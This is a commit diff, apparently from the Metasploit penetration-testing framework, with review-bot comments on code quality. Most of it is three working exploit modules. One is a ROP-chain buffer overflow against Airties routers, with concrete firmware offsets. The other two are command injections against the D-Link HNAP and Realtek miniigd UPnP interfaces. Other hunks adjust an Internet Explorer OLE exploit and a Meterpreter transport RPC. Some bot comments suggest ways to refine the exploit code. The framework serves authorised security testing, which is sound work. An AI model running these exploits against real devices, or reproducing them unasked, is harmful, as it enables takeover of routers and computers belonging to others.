Merge branch 'upstream-master' into bapv2

bug/bundler_fix
wchen-r7 2015-05-29 14:59:04 -05:00
commit 13779adab4
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
11 changed files with 500 additions and 13 deletions


@ -22,7 +22,7 @@ before_script:
- bundle exec rake db:migrate
script:
# fail build if db/schema.rb update is not committed
- git diff --exit-code && bundle exec rake $RAKE_TASKS
- git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
sudo: false
rvm:
- '2.1.6'


@ -395,6 +395,38 @@ class RPC_Session < RPC_Base
rpc_meterpreter_run_single( sid, "run #{data}")
end
# Changes the Transport of a given Meterpreter Session
#
# @param sid [Fixnum] The Session ID of the `Msf::Session`
# @option opts [String] :transport The transport protocol to use (e.g. reverse_tcp, reverse_http, bind_tcp etc)
# @option opts [String] :lhost The LHOST of the listener to use
# @option opts [String] :lport The LPORT of the listener to use
# @option opts [String] :ua The User Agent String to use for reverse_http(s)
# @option opts [String] :proxy_host The address of the proxy to route transport through
# @option opts [String] :proxy_port The port the proxy is listening on
# @option opts [String] :proxy_type The type of proxy to use
# @option opts [String] :proxy_user The username to authenticate to the proxy with
# @option opts [String] :proxy_pass The password to authenticate to the proxy with
# @option opts [String] :comm_timeout Connection timeout in seconds
# @option opts [String] :session_exp Session Expiration Timeout
# @option opts [String] :retry_total Total number of times to retry etsablishing the transport
# @option opts [String] :retry_wait The number of seconds to wait between retries
# @option opts [String] :cert Path to the SSL Cert to use for HTTPS
# @return [Boolean] whether the transport was changed successfully
def rpc_meterpreter_transport_change(sid,opts={})
session = _valid_session(sid,"meterpreter")
real_opts = {}
opts.each_pair do |key, value|
real_opts[key.to_sym] = value
end
real_opts[:uuid] = session.payload_uuid
result = session.core.transport_change(real_opts)
if result == true
rpc_stop(sid)
end
result
end
# Returns the separator used by the meterpreter.
#
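Review bot: The `opts.each_pair` loop that ends in `real_opts[key.to_sym] = value` symbolizes every key the RPC caller supplies, so unknown option names flow into `real_opts` unchanged and, on the Ruby 2.1.x line the .travis.yml in this commit pins, each new key also becomes a symbol that is never collected. Copying only the documented keys keeps both problems out: `real_opts = opts.select { |k, _| TRANSPORT_OPTS.include?(k.to_s) }.map { |k, v| [k.to_sym, v] }.to_h`, with `TRANSPORT_OPTS` a frozen array of the `@option` names listed in the YARD block. The `if result == true ... end` around `rpc_stop(sid)` reads better as the modifier form `rpc_stop(sid) if result == true`, keeping the strict comparison since `transport_change`'s return value is only documented here as Boolean. The YARD types for `:lport`, `:comm_timeout`, `:retry_total` and `:retry_wait` say String while the names suggest integers; worth confirming against the core method and correcting. `RPC_Session` starts outside the hunk.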


@ -27,9 +27,12 @@ class CmdStagerEcho < CmdStagerBase
#
def generate(opts = {})
opts[:temp] = opts[:temp] || '/tmp/'
opts[:temp].gsub!(/\\/, "/")
opts[:temp] = opts[:temp].shellescape
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
unless opts[:temp].empty?
opts[:temp].gsub!(/\\/, '/')
opts[:temp] = opts[:temp].shellescape
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
end
# by default use the 'hex' encoding
opts[:enc_format] = opts[:enc_format] || 'hex'
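Review bot: Inside the new `unless opts[:temp].empty?` guard the `opts[:temp].gsub!(/\\/, '/')` line still edits the caller's string object in place, so a frozen `:temp` raises and a shared one is silently rewritten for whoever passed it; the non-destructive form gives the same result: `opts[:temp] = opts[:temp].gsub(/\\/, '/').shellescape` followed by `opts[:temp] += '/' unless opts[:temp].end_with?('/')`. Because the `|| '/tmp/'` default is applied before the guard, only an explicit empty string takes the skip path while `nil` still becomes `/tmp/`; that is easy to misread and deserves a comment on the guard line, e.g. `# an explicit '' disables the temp prefix; nil still defaults to /tmp/`. `generate` continues outside the hunk.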


@ -0,0 +1,151 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Airties login-cgi Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow vulnerability on several Airties routers.
The vulnerability exists in the handling of HTTP queries to the login cgi with long
redirect parameters. The vulnerability doesn't require authentication. This module has
been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.
Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,
Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
},
'Author' =>
[
'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSBE,
'References' =>
[
['EDB', '36577'],
['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC
],
'Targets' =>
[
[ 'AirTies_Air5650v3TT_FW_1.0.2.0',
{
'Offset' => 359,
'LibcBase' => 0x2aad1000,
'RestoreReg' => 0x0003FE20, # restore s-registers
'System' => 0x0003edff, # address of system-1
'CalcSystem' => 0x000111EC, # calculate the correct address of system
'CallSystem' => 0x00041C10, # call our system
'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call
}
]
],
'DisclosureDate' => 'Mar 31 2015',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
res = send_request_cgi({
'uri' => '/cgi-bin/login',
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Accessing the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 100
)
end
def prepare_shellcode(cmd)
shellcode = rand_text_alpha_upper(target['Offset']) # padding
shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N") # restore registers with controlled values
# 0003FE20 lw $ra, 0x48+var_4($sp)
# 0003FE24 lw $s7, 0x48+var_8($sp)
# 0003FE28 lw $s6, 0x48+var_C($sp)
# 0003FE2C lw $s5, 0x48+var_10($sp)
# 0003FE30 lw $s4, 0x48+var_14($sp)
# 0003FE34 lw $s3, 0x48+var_18($sp)
# 0003FE38 lw $s2, 0x48+var_1C($sp)
# 0003FE3C lw $s1, 0x48+var_20($sp)
# 0003FE40 lw $s0, 0x48+var_24($sp)
# 0003FE44 jr $ra
# 0003FE48 addiu $sp, 0x48
shellcode << rand_text_alpha_upper(36) # padding
shellcode << [target['LibcBase'] + target['System']].pack('N') # s0 - system address-1
shellcode << rand_text_alpha_upper(16) # unused registers $s1 - $s4
shellcode << [target['LibcBase'] + target['CallSystem']].pack('N') # $s5 - call system
# 00041C10 move $t9, $s0
# 00041C14 jalr $t9
# 00041C18 nop
shellcode << rand_text_alpha_upper(8) # unused registers $s6 - $s7
shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parameter for call to system
# 000215B8 addiu $a0, $sp, 0x20
# 000215BC lw $ra, 0x1C($sp)
# 000215C0 jr $ra
# 000215C4 addiu $sp, 0x20
shellcode << rand_text_alpha_upper(28) # padding
shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N') # add 1 to s0 (calculate system address)
# 000111EC move $t9, $s5
# 000111F0 jalr $t9
# 000111F4 addiu $s0, 1
shellcode << cmd
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/cgi-bin/login',
'encode_params' => false,
'vars_post' => {
'redirect' => shellcode,
'user' => rand_text_alpha(5),
'password' => rand_text_alpha(8)
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
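Review bot: In `check` the `rescue ::Rex::ConnectionError` branch returns `Exploit::CheckCode::Unknown` silently, which is exactly what the fall-through already returns, so an operator cannot tell "not an Airties login page" from "could not reach the host"; a `vprint_error("#{peer} - Connection failed")` before that return keeps the result and adds the signal. The same silent rescue appears in the `check` methods of the new D-Link and Realtek modules in this commit. `execute_command(cmd, opts)` never reads `opts`; naming it `_opts` documents that. `prepare_shellcode` has no header comment; a short one would say that it returns the POST `redirect` value built from `target['Offset']` bytes of padding, the gadget addresses computed as `target['LibcBase']` plus the per-gadget offsets (the inline disassembly comments explain each), and finally `cmd`, which the comments indicate becomes the argument handed to system.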


@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS
'Arch' => ARCH_MIPSBE
}
],
],


@ -0,0 +1,117 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices UPnP SOAPAction-Header Command Execution',
'Description' => %q{
Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
interface. Since it is a blind OS command injection vulnerability, there is no
output for the executed command. This module has been tested on a DIR-645 device.
The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
},
'Author' =>
[
'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
'Craig Heffner', # independent Vulnerability discovery on different other routers
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
],
'DisclosureDate' => 'Feb 13 2015',
'Privileged' => true,
'Platform' => 'linux',
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
{
'Arch' => ARCH_MIPSBE
}
]
],
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
uri = '/HNAP1/'
soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soap_action,
}
})
if res && [200].include?(res.code) && res.body =~ /D-Link/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the device ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 200,
:temp => ''
)
end
def execute_command(cmd, opts)
uri = '/HNAP1/'
cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soap_action,
}
}, 3)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
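Review bot: `execute_command` assigns `res = send_request_cgi({...}, 3)` but never uses it, and unlike the Airties module's `execute_command` in this same commit it does not return it, so the assignment reads as dead code; either drop the `res =` or `return res` for consistency. The bare `3` second argument is an unexplained timeout; since the description states this is a blind injection with no output, a comment on that line such as `# short read timeout: the injection is blind, no response body is expected` would make the choice reviewable (presumably that is the reason, worth confirming). `uri = '/HNAP1/'` and the `http://purenetworks.com/HNAP1/GetDeviceSettings` prefix are duplicated between `check` and `execute_command`; hoisting them to frozen constants keeps the two paths from drifting. `[200].include?(res.code)` in `check` is just `res.code == 200`.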


@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS
'Arch' => ARCH_MIPSBE
}
],
],


@ -0,0 +1,167 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',
'Description' => %q{
Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command
injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,
there is no output for the executed command. This module has been tested successfully on a
Trendnet TEW-731BR router with emulation.
},
'Author' =>
[
'Ricky "HeadlessZeke" Lawshae', # Vulnerability discovery
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-8361'],
['ZDI', '15-155'],
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']
],
'DisclosureDate' => 'Apr 24 2015',
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
]
],
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
register_options(
[
Opt::RPORT(52869) # port of UPnP SOAP webinterface
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/picsdesc.xml'
})
if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\/1.0 UPnP\/1.0/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the device ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 50,
:nodelete => true
)
end
def execute_command(cmd, opts)
uri = '/wanipcn.xml'
soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'
data_cmd = '<?xml version="1.0"?>' + build_soap_req
begin
res = send_request_cgi({
'uri' => uri,
'vars_get' => {
'service' => 'WANIPConn1'
},
'ctype' => 'text/xml',
'method' => 'POST',
'headers' => {
'SOAPAction' => soap_action
},
'data' => data_cmd.gsub(/CMD_HERE/, "`#{cmd.gsub(/\\/, '\\\\\\\\\\')}`")
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def build_soap_req
new_external_port = rand(32767) + 32768
new_internal_port = rand(32767) + 32768
xml = Document.new
xml.add_element(
'SOAP-ENV:Envelope',
{
'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
})
xml.root.add_element('SOAP-ENV:Body')
body = xml.root.elements[1]
body.add_element(
'm:AddPortMapping',
{
'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'
})
port_mapping = body.elements[1]
port_mapping.add_element('NewLeaseDuration')
port_mapping.add_element('NewInternalClient')
port_mapping.add_element('NewEnabled')
port_mapping.add_element('NewExternalPort')
port_mapping.add_element('NewRemoteHost')
port_mapping.add_element('NewProtocol')
port_mapping.add_element('NewInternalPort')
port_mapping.elements['NewLeaseDuration'].text = ''
port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'
port_mapping.elements['NewEnabled'].text = '1'
port_mapping.elements['NewExternalPort'].text = "#{new_external_port}"
port_mapping.elements['NewRemoteHost'].text = ''
port_mapping.elements['NewProtocol'].text = 'TCP'
port_mapping.elements['NewInternalPort'].text = "#{new_internal_port}"
xml.to_s
end
end
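Review bot: In `execute_command` the `'data' => data_cmd.gsub(/CMD_HERE/, ...)` line splices `cmd` into the document after `build_soap_req` has serialized it, so REXML's entity escaping is deliberately bypassed and a `cmd` containing `<` or `&` yields malformed XML; that constraint is invisible to a future caller and should be stated where the placeholder is set, e.g. `# placeholder is replaced after serialization so the command is not entity-escaped; cmd must not contain '<' or '&'`. The replacement `'\\\\\\\\\\'` in `cmd.gsub(/\\/, ...)` is hard to read because gsub also interprets backslash sequences in a replacement string; the block form `cmd.gsub('\\') { '<the intended run of backslashes>' }` is taken literally, so the intended multiplicity can be written and commented directly. In `build_soap_req`, `rand(32767) + 32768` twice is `rand(32768..65535)`. `include REXML` pulls the whole REXML namespace into the exploit class for a single `Document.new`; `REXML::Document.new` without the include is clearer.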


@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'MIPS Big Endian', # unknown if there are big endian devices out there
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS
'Arch' => ARCH_MIPSBE
}
]
],


@ -19,8 +19,9 @@ class Metasploit4 < Msf::Exploit::Remote
'Name' => "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
'Description' => %q{
This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to
Windows 10, and there is no patch for Windows XP or older.
The vulnerability is known to affect Internet Explorer 3.0 until version 11 within
Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will
only target Windows XP and Windows 7 box due to the Powershell limitation.
Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
newer Windows systems, the exploit will try using Powershell instead.
@ -56,9 +57,9 @@ class Metasploit4 < Msf::Exploit::Remote
}
],
[
'Other Windows x86',
'Windows 7',
{
'os_name' => OperatingSystems::Match::WINDOWS,
'os_name' => OperatingSystems::Match::WINDOWS_7
}
]
],
@ -84,6 +85,7 @@ class Metasploit4 < Msf::Exploit::Remote
register_options(
[
OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
OptBool.new('AllowPowershellPrompt', [true, 'Allow exploit to try Powershell', false])
], self.class )
end
@ -358,6 +360,11 @@ end function
end
def on_request_exploit(cli, request, target_info)
if get_target.name.match(OperatingSystems::Match::WINDOWS_7) && !datastore['AllowPowershellPrompt']
send_not_found(cli)
return
end
case request.uri
when /\.gif/
if get_target.name =~ OperatingSystems::Match::WINDOWS_XP
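Review bot: The new gate at the top of `on_request_exploit` calls `send_not_found(cli)` and returns without logging anything, so with the new `AllowPowershellPrompt` option at its default `false` a Windows 7 target just sees a 404 and the operator gets no hint why the exploit never fired; a `print_warning("AllowPowershellPrompt is false, not serving the Powershell vector to the Windows 7 target")` before `send_not_found(cli)` makes the behaviour visible. The gate uses `get_target.name.match(...)` while the `when /\.gif/` branch a few lines down uses `get_target.name =~ ...`; pick one form. The `OptBool` description `'Allow exploit to try Powershell'` could say that it is required for the Windows 7 target, which is what the gate enforces. `on_request_exploit` continues outside the hunk.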


@ -54,7 +54,10 @@ require 'msf/core/payload_generator'
opts = {}
datastore = {}
opt = OptionParser.new
opt.banner = "Usage: #{$0} [options] <var=val>"
banner = "MsfVenom - a Metasploit standalone payload generator.\n"
banner << "Also a replacement for msfpayload and msfencode.\n"
banner << "Usage: #{$0} [options] <var=val>"
opt.banner = banner
opt.separator('')
opt.separator('Options:')
@ -292,7 +295,14 @@ if __FILE__ == $0
$stdout.puts dump_encoders
$stdout.puts dump_nops
else
$stderr.puts "Invalid module type"
if mod == 'payload'
question = ". Do you mean 'payloads'?"
elsif mod == 'encoder'
question = ". Do you mean 'encoders'?"
elsif mod == 'nop'
quesetion = ". Do you mean 'nops'?"
end
$stderr.puts "Invalid module type#{question}"
end
end
exit(0)
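Review bot: `quesetion = ". Do you mean 'nops'?"` in the `elsif mod == 'nop'` branch assigns a misspelled local, so the `nops` hint is never printed and that line is dead; it should read `question = ". Do you mean 'nops'?"`. The chain also leaves `question` unassigned for any other value of `mod`, which only works because a nil interpolates as an empty string. A lookup removes both the branch chain and the chance of another misspelling: `plural = { 'payload' => 'payloads', 'encoder' => 'encoders', 'nop' => 'nops' }[mod]` followed by `$stderr.puts "Invalid module type#{". Do you mean '#{plural}'?" if plural}"`.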